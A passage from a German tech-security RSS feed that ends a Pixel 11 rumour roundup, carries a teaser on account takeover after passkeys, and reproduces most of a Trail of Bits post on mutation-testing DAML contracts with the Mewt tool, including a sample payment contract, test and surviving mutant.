<p>Da die Funktion mehrfarbige Lichter nutzen wird, ist davon auszugehen, dass Sie bestimmte Benachrichtigungen farblich kennzeichnen können, sodass Sie auf einen Blick genau erkennen, was das Smartphone Ihnen mitteilen möchte – sei es ein eingehender Anruf oder eine Lieferbenachrichtigung.</p>



<p>Google scheint von den Fähigkeiten von „Pixel Glow“ ziemlich überzeugt zu sein, da die Beta-Version auch darauf hindeutet, dass das Konzept in einem kommenden Laptop zum Einsatz kommen wird. Seitdem wurden <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/" target="_blank" rel="noreferrer noopener">Googlebooks mit einer „Glowbar“ angekündigt</a>, was uns eine Art Vorschau darauf gibt, wie dies beim Pixel 11 aussehen könnte.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4baba8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-teaser-Glow.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3145379" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Ein kleiner Vorgeschmack darauf, wie die Idee aussehen könnte, war im Rahmen der Google I/O 2026 zu sehen, wo wir ganz kurz einen Lichtring um ein Pixel 10 Pro XL erkennen konnten. Es ist bestenfalls flüchtig, wirkt aber wie ein möglicher Vorgeschmack von Google darauf, was uns erwartet – auch wenn es Teil eines KI-Abschnitts war, in dem nicht viel real war.</p>



<p>Wir haben Gemini gebeten, ein Konzeptbild für „Pixel Glow“ zu erstellen, und die Ergebnisse sind recht interessant. Nach mehreren Eingabeaufforderungen gelang es uns, Googles charakteristische Farben um die Kameraleiste herum erscheinen zu lassen, und obwohl es sich nach wie vor nur um eine Visualisierung einer möglichen Zukunft handelt, spricht definitiv einiges dafür, dass dies der Rückseite des Smartphones ein zusätzliches Flair verleiht.</p>



<p>Eine andere Möglichkeit wäre, dass es Teil des „G“-Logos ist, doch wir halten dies für weniger wahrscheinlich.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb05e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-with-camera-bar-Pixel-Glow-lights-by-Gemini.png?w=805" alt="Pixel 11 with camera bar Pixel Glow lights by Gemini" class="wp-image-3137669" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



<p>Obwohl die Pixel-11-Reihe von „Pixel Glow“ profitieren soll, scheint es, als wolle Google im Gegenzug etwas weglassen, nämlich den Temperatursensor. Der Temperatursensor, der ursprünglich bereits beim <a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a> eingeführt wurde, wirkte oft wie ein unausgereiftes Konzept, zumal es zum Zeitpunkt der Markteinführung keinen offensichtlichen Nutzen gab und der Eindruck entstand, dass die Technologie auf Drittanbieter angewiesen war, um ihre Existenz zu rechtfertigen. Daher stört es uns nicht sonderlich, dass er entfernt wird.</p>



<p>Schade ist jedoch, dass nach Gerüchten, wonach ein vollwertiges Äquivalent zu Apples Face ID in der Entwicklung sei und in der Pixel-11-Reihe sein Debüt feiern sollte, nun offenbar feststeht, dass diese Technologie den Markteintritt komplett verpassen und wahrscheinlich erst in den Modellen des nächsten Jahres zum Einsatz kommen wird.</p>



<p>Das Fehlen einer vollwertigen Gesichtserkennung wird die neuen Pixel-Modelle, insbesondere die höherpreisigen, gegenüber bestimmten Android-Geräten wie dem <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> benachteiligen, das über einen frontseitigen 3D-Scanner verfügt, der Apples „Dynamic Island“ durchaus ähnelt.</p>



<h3 class="wp-block-heading">Pixel 11: Akku &amp; Aufladen</h3>



<p>Zwar wurden die Akku-Spezifikationen für die Pixel-11-Serie noch nicht bekannt gegeben, doch gibt es einen interessanten Hinweis, der bereits in die Gerüchteküche gelangt ist: die Möglichkeit eines austauschbaren Akkus.</p>



<p>Vor allem dank Apple und dessen Beharren auf einem einheitlichen Gehäuse haben so gut wie alle Hersteller das Konzept der austauschbaren Akkus aufgegeben, obwohl diese Funktion einst ein fester Bestandteil von Mobiltelefonen im Allgemeinen war. Einem kürzlich veröffentlichten <a href="https://hypertxt.ai/blog-images/Google-Pixel-Removable-Battery.pdf" target="_blank" rel="noreferrer noopener">Patent </a>zufolge scheint es jedoch, als würde Google darüber nachdenken, dieses Konzept wieder aufzugreifen – möglicherweise für das Pixel 11 Fold.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb561"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Pixel-11-Pro-Fold-Battery-Patent.png?w=1200" alt="Pixel 11 Pro Fold Removable Battery Patent" class="wp-image-3037196" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">US Patent</p></div>



<p>Da die faltbaren Pixel-Smartphones deutlich mehr Energie benötigen, um ihre größeren internen Bildschirme mit Strom zu versorgen, könnte ein schnell austauschbarer Akku für intensive Nutzer eine echte Rettung sein. Es lässt sich nicht sagen, ob Google diese Funktion auch für andere Modelle der Pixel-11-Reihe in Betracht zieht, doch wir würden uns sehr darüber freuen – insbesondere, da dies die Smartphones angesichts der nachlassenden Akkuleistung zu einer weitaus praktikableren Langzeitlösung machen würde.</p>



<p>Google könnte zudem schnellere Ladezeiten einführen und die Akkulaufzeit verbessern, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bba15"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixelsnap-Charger.png?w=1200" alt="Google Pixelsnap charger" class="wp-image-2880960" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Abgesehen von diesen Gerüchten besteht die größere Hoffnung, dass Google möglicherweise auch schnellere Ladezeiten einführt und die Akkulaufzeit insgesamt verbessert, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<p>Schließlich verfügt die Pixel-10-Serie über integriertes magnetisches Qi2-Laden – ähnlich wie Magsafe –, wobei das XL-Modell mit Qi2.2 eine kabellose Ladegeschwindigkeit von 25 Watt erreicht.</p>



<p>Hoffentlich werden alle Pixel-11-Smartphones den schnelleren Qi2.2-Standard sowie die kabelgebundene Ladegeschwindigkeit von 45 Watt des Pixel 10 Pro XL erhalten.</p>



<h3 class="wp-block-heading">Pixel 11: Software</h3>



<p>Es wird erwartet, dass das Software-Erlebnis der Pixel-11-Serie eng mit den neuesten KI-Entwicklungen von Google verzahnt sein wird und Funktionen bietet, die die alltägliche Interaktion mit dem Gerät vereinfachen und verbessern. Dank eines Berichts erfahren wir bereits einiges darüber.</p>



<p>Eine der erwarteten Software-Verbesserungen ist die Funktion „Speak-to-Tweak“, mit der Nutzer sprachgesteuerte Anpassungen an ihren Fotos vornehmen können. Durch das einfache Aussprechen von Befehlen können Nutzer Bildeinstellungen wie Helligkeit, Kontrast und Sättigung optimieren, wodurch die Bildbearbeitung intuitiver und zugänglicher wird.</p>



<p>Darüber hinaus könnte die Pixel-11-Serie über „Sketch-to-Image“ verfügen, ein Tool, das grobe Skizzen in detaillierte Bilder umwandelt, ähnlich wie bei Samsungs Galaxy AI. Diese Funktion dürfte besonders für kreative Nutzer nützlich sein, die aus einfachen Skizzen Kunstwerke oder visuelle Inhalte erstellen möchten.</p>



<p>Eine weitere Software-Innovation mit dem vorläufigen Namen „Magic Mirror“ soll sich Gerüchten zufolge in der Entwicklung befinden, wobei konkrete Details noch unklar sind. Diese Funktion könnte neue KI-basierte Anpassungsoptionen für Fotos oder Videos einführen und damit möglicherweise die Personalisierungs- oder Verschönerungsfunktionen innerhalb der Foto- und Videobearbeitungs-Apps des Geräts verbessern.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bbf52"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-35.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 35" class="wp-image-2454270" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Die Pixel-11-Serie könnte dank der im Tensor-G6-Chip integrierten nanoTPU-Technologie zudem mit einer Reihe von durchgehend aktiven Tools zur Gesundheitsüberwachung auf den Markt kommen. Diese Suite von ML-basierten Funktionen könnte die Erkennung von Schlafapnoe, Schnarchen und Husten sowie sogar die Sturzerkennung umfassen, was das Pixel 11 zu einem leistungsstarken Gerät für gesundheitsbewusste Nutzer macht.</p>



<p>Die Serie könnte zudem neue fitnessorientierte Funktionen wie „Running ML“ enthalten, das Läufern Echtzeit-Feedback liefert, darunter anpassbare Tempovorgaben und eine Gleichgewichtsanalyse, und den Nutzern so hilft, ihre Trainingsroutinen zu optimieren.</p>



<p>Zusätzlich zu diesen Neuerungen könnte das Pixel 11 die Unterstützung für Googles „Quick Phrases“ erweitern – eine Funktion, mit der Nutzer bestimmte Aktionen ausführen können, ohne den Google Assistant vollständig zu aktivieren.</p>



<p>Das Potenzial für verbesserte „Quick Phrases“ könnte alltägliche Aufgaben wie das Annehmen von Anrufen oder die Steuerung von Smart-Home-Geräten vereinfachen und die Smartphones der Pixel-11-Serie zu äußerst reaktionsschnellen Geräten machen, die sich nahtlos in den Alltag der Nutzer integrieren.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bc43f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_12.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 12" class="wp-image-2457636" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Wir wissen nun wesentlich mehr darüber, was Google mit <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a> für das gesamte Ökosystem bereithält. Dazu gehören ein starker Fokus auf die Google-KI, die Aufgaben für Sie übernimmt, sowie Funktionen, die Ihr Wohlbefinden in den Vordergrund stellen, wie „Pause Point“. Smartphones von Google und Samsung werden als erste von der aktualisierten Software profitieren, sodass Fans davon ausgehen können, Android 17 mit der Pixel-11-Reihe direkt nach dem Auspacken nutzen zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-4 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF4"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-4 POST @@--></div>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p>Das ist alles, was wir bislang über die Pixel-11-Serie wissen, doch wir werden diesen Artikel bis zur Markteinführung fortlaufend aktualisieren, sobald neue Gerüchte und Leaks bekannt werden.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ATO 2026: Warum Passkeys den nächsten Angriff auf die Verifikation verschieben]]></title>
<description><![CDATA[LONDON / LONDON (IT BOLTWISE) – Passkeys machen den klassischen Account-Login mit gestohlenen Passwörtern zunehmend unattraktiv. Gleichzeitig verlagert sich Account Takeover (ATO) in Richtung der verbleibenden „Verifikations-Lücken“: Wiederanmeldung, Magic-Links und Schritt-für-Schritt-Checks. Ne...]]></description>
<link>https://tsecurity.de/de/3654338/it-security-nachrichten/ato-2026-warum-passkeys-den-naechsten-angriff-auf-die-verifikation-verschieben/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654338/it-security-nachrichten/ato-2026-warum-passkeys-den-naechsten-angriff-auf-die-verifikation-verschieben/</guid>
<pubDate>Wed, 08 Jul 2026 14:52:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-ato-2026-verification-magic-link-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON / LONDON (IT BOLTWISE) – Passkeys machen den klassischen Account-Login mit gestohlenen Passwörtern zunehmend unattraktiv. Gleichzeitig verlagert sich Account Takeover (ATO) in Richtung der verbleibenden „Verifikations-Lücken“: Wiederanmeldung, Magic-Links und Schritt-für-Schritt-Checks. Neue Zahlen zeigen, dass Identitätsbetrug sich zunehmend durch KI-generierte oder manipulierte Medien speist. Für Unternehmen bedeutet das: Sicherheitsarchitekturen müssen Verifikationsmedien, Risiko und Autorisierungsintention gemeinsam […]</p>
<div><a href="https://www.it-boltwise.de/ato-2026-warum-passkeys-den-naechsten-angriff-auf-die-verifikation-verschieben.html">... den vollständigen Artikel <strong>»ATO 2026: Warum Passkeys den nächsten Angriff auf die Verifikation verschieben«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ato-2026-warum-passkeys-den-naechsten-angriff-auf-die-verifikation-verschieben.html">ATO 2026: Warum Passkeys den nächsten Angriff auf die Verifikation verschieben</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
